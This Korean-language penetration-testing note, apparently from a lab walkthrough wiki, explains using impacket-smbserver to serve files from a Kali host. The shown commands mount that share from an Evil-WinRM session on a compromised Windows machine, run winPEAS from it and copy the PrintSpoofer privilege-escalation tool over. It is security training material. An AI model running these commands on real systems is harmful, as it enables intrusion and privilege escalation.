smbserver

ㅊ1. 개요

linux 와 windows 간 파일 이동을 하기 위한 툴

2. 사용법

2.1. 서버 여는 법

서버로 사용될 kali 에서 아래와 같이 명령어를 작성해 서버 개방을 하고 usernamepassword 를 설정한다.

┌──(root㉿kali)-[/home/kali/labs/sauna]
└─# impacket-smbserver share . -smb2support -username asdf -password asdf                                                           
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed

2.2. 공유 폴더에 접근

evil-winrm 등으로 원격 접속을 한 프롬프트에서 위에서 개방한 서버 쪽에 아래와 같은 명령어를 입력해 접근을 시도한다. 그러면 share 라는 폴더가 리눅스에 존재하는데, 해당 되는 파일들을 windows 쪽에서 즉시 실행시킬 수 있다.

*Evil-WinRM* PS C:\Users\FSmith\Documents> net use \\10.10.14.143\share /u:asdf asdf
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Documents> cd \\10.10.14.143\share\
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\10.10.14.143\share>

파일을 즉시 실행시키는 모습은 아래와 같다. winPEASx64.exe 는 서버(kali)에 존재하는 바이너리이나, windows 에서 실행하는 모습이다.

*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\10.10.14.143\share> .\winPEASx64.exe cmd fast > winpeas_fast

2.3. 파일 바로 가져오기

copy 명령어를 작성하면 바로 가져올 수 있다.

C:\Windows\Temp>copy \\10.10.14.143\share\PrintSpoofer64.exe .
copy \\10.10.14.143\share\PrintSpoofer64.exe .
        1 file(s) copied.
Updated on
psexec
6️⃣ Privilege Escalation